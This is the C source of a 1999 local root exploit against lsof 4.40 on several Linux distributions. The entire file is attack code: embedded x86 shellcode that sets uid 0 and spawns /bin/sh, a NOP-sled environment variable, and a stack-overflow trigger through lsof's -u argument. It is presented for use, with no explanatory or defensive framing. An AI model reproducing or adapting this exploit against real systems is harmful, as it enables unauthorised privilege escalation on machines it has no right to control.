/*
 * ls0f.c (c) 1999 Subterrain Security
 * Written by bind - 1999
 *
 * Vulnerable: linux machines running lsof 4.40
 *
 * Cheers to xdr & cripto...
 *
 *     *Affected*
 * [ SuSE 6.0 + 5.3 ]
 * [   Debian 2.0   ]
 * [   Redhat 5.2   ]
 *
 */

#include <stdio.h>
#include <strings.h>

#define LSOF "/usr/sbin/lsof"

char shellcode[] =
  "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
  "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
  "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
  __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
  char code[2000];
  char ret[28];
  int offset, i;
  int len = strlen(shellcode);

  if(argc > 1) offset = atoi(argv[1]);

  for(i = 0;i <= 28;i += 4)
    *(long *)&ret[i] = (unsigned long) get_sp() - offset;

  memset(code, 0x90, 2000);
  memcpy(code+(2000 - len), shellcode, len);

  setenv("CODE", code, 1);
  execl(LSOF,"lsof","-u",ret,NULL);
}

/*                    www.hack.co.za              [2000]*/